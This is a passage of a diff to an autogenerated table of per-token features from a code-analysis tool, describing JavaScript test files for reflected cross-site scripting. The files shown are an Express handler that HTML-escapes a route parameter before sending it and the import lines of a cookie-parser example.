contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:78:16:78:18 | str | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:78:16:78:18 | str | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:78:16:78:18 | str | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:1:82:3 | app | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:1:82:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:1:82:3 | app | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:1:82:7 | app.get | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:1:82:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:1:82:7 | app.get | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:1:86:2 | app.get ... / OK\\n}) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:1:86:2 | app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:1:86:2 | app.get ... / OK\\n}) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:1:86:2 | exceptional return of app.get ... / OK\\n}) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:1:86:2 | exceptional return of app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:1:86:2 | exceptional return of app.get ... / OK\\n}) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:5:82:7 | get | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:5:82:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:5:82:7 | get | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:9:82:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:9:82:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:9:82:19 | '/user/:id' | calleeImports | express | @@ -21275,6 +141928,26 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:9:82:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:9:82:19 | '/user/:id' | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:9:82:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:82:21 | escapeHtml2 | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:82:21 | escapeHtml2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:82:21 | escapeHtml2 | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:82:21 | escapeHtml2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:82:21 | escapeHtml2 | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:82:21 | this | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:82:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:82:21 | this | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:82:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:82:21 | this | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | 'arguments' object of anonymous function | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | exceptional return of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | exceptional return of anonymous function | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | exceptional return of anonymous function | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | functio ... // OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | functio ... // OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | functio ... // OK\\n} | calleeImports | express | @@ -21282,6 +141955,101 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | functio ... // OK\\n} | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | functio ... // OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | return of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | return of anonymous function | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:22:86:1 | return of anonymous function | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:31:82:33 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:31:82:33 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:31:82:33 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:31:82:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:31:82:33 | req | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:31:82:33 | req | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:31:82:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:31:82:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:31:82:33 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:31:82:33 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:36:82:38 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:36:82:38 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:36:82:38 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:36:82:38 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:36:82:38 | res | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:36:82:38 | res | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:36:82:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:36:82:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:36:82:38 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:82:36:82:38 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:9:83:11 | url | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:9:83:11 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:9:83:11 | url | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:9:83:11 | url | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:9:83:11 | url | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:9:83:27 | url | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:9:83:27 | url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:9:83:27 | url | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:9:83:27 | url | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:9:83:27 | url | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:9:83:27 | url = req.params.id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:9:83:27 | url = req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:9:83:27 | url = req.params.id | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:9:83:27 | url = req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:9:83:27 | url = req.params.id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:15:83:17 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:15:83:17 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:15:83:17 | req | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:15:83:17 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:15:83:17 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:15:83:24 | req.params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:15:83:24 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:15:83:24 | req.params | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:15:83:24 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:15:83:24 | req.params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:15:83:27 | req.params.id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:15:83:27 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:15:83:27 | req.params.id | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:15:83:27 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:15:83:27 | req.params.id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:19:83:24 | params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:19:83:24 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:19:83:24 | params | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:19:83:24 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:19:83:24 | params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:26:83:27 | id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:26:83:27 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:26:83:27 | id | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:26:83:27 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:83:26:83:27 | id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:5 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:5 | res | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:5 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:10 | res.send | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:10 | res.send | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:10 | res.send | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:28 | exceptional return of res.sen ... 2(url)) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:28 | exceptional return of res.sen ... 2(url)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:28 | exceptional return of res.sen ... 2(url)) | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:28 | exceptional return of res.sen ... 2(url)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:28 | exceptional return of res.sen ... 2(url)) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:28 | res.sen ... 2(url)) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:28 | res.sen ... 2(url)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:28 | res.sen ... 2(url)) | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:28 | res.sen ... 2(url)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:3:85:28 | res.sen ... 2(url)) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:7:85:10 | send | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:7:85:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:7:85:10 | send | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:7:85:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:7:85:10 | send | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:12:85:22 | escapeHtml2 | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:12:85:22 | escapeHtml2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:12:85:22 | escapeHtml2 | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:12:85:22 | escapeHtml2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:12:85:22 | escapeHtml2 | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:12:85:27 | escapeHtml2(url) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:12:85:27 | escapeHtml2(url) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:12:85:27 | escapeHtml2(url) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | @@ -21290,18 +142058,101 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:12:85:27 | escapeHtml2(url) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:12:85:27 | escapeHtml2(url) | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:12:85:27 | escapeHtml2(url) | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:12:85:27 | exceptional return of escapeHtml2(url) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:12:85:27 | exceptional return of escapeHtml2(url) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:12:85:27 | exceptional return of escapeHtml2(url) | enclosingFunctionBody | req res url req params id res send escapeHtml2 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:12:85:27 | exceptional return of escapeHtml2(url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:85:12:85:27 | exceptional return of escapeHtml2(url) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/cookies.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:1:1:1:0 | this | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:1:1:1:1 | require | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:1:5:1:11 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:1:5:1:11 | express | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:1:5:1:32 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:1:5:1:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:1:5:1:32 | express | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:1:5:1:32 | express ... press') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:1:5:1:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:1:5:1:32 | express ... press') | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:1:15:1:21 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:1:15:1:21 | require | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:1:15:1:32 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:1:15:1:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:1:15:1:32 | exceptional return of require('express') | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:1:15:1:32 | require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:1:15:1:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:1:15:1:32 | require('express') | fileImports | cookie-parser express | | autogenerated/Xss/ReflectedXss/cookies.js:1:23:1:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/cookies.js:1:23:1:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/cookies.js:1:23:1:31 | 'express' | calleeImports | | | autogenerated/Xss/ReflectedXss/cookies.js:1:23:1:31 | 'express' | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/cookies.js:1:23:1:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/cookies.js:1:23:1:31 | 'express' | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:2:5:2:16 | cookieParser | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:2:5:2:16 | cookieParser | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:2:5:2:16 | cookieParser | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:2:5:2:43 | cookieP ... arser') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:2:5:2:43 | cookieP ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:2:5:2:43 | cookieP ... arser') | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:2:5:2:43 | cookieParser | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:2:5:2:43 | cookieParser | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:2:5:2:43 | cookieParser | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:2:20:2:26 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:2:20:2:26 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:2:20:2:26 | require | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:2:20:2:43 | exceptional return of require ... arser') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:2:20:2:43 | exceptional return of require ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:2:20:2:43 | exceptional return of require ... arser') | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:2:20:2:43 | require ... arser') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:2:20:2:43 | require ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:2:20:2:43 | require ... arser') | fileImports | cookie-parser express | | autogenerated/Xss/ReflectedXss/cookies.js:2:28:2:42 | 'cookie-parser' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/cookies.js:2:28:2:42 | 'cookie-parser' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/cookies.js:2:28:2:42 | 'cookie-parser' | calleeImports | | | autogenerated/Xss/ReflectedXss/cookies.js:2:28:2:42 | 'cookie-parser' | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/cookies.js:2:28:2:42 | 'cookie-parser' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/cookies.js:2:28:2:42 | 'cookie-parser' | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:4:5:4:7 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:4:5:4:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:4:5:4:7 | app | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:4:5:4:19 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:4:5:4:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:4:5:4:19 | app | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:4:5:4:19 | app = express() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:4:5:4:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:4:5:4:19 | app = express() | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:4:11:4:17 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:4:11:4:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:4:11:4:17 | express | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:4:11:4:19 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:4:11:4:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:4:11:4:19 | exceptional return of express() | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:4:11:4:19 | express() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:4:11:4:19 | express() | contextSurroundingFunctionParameters | | +| 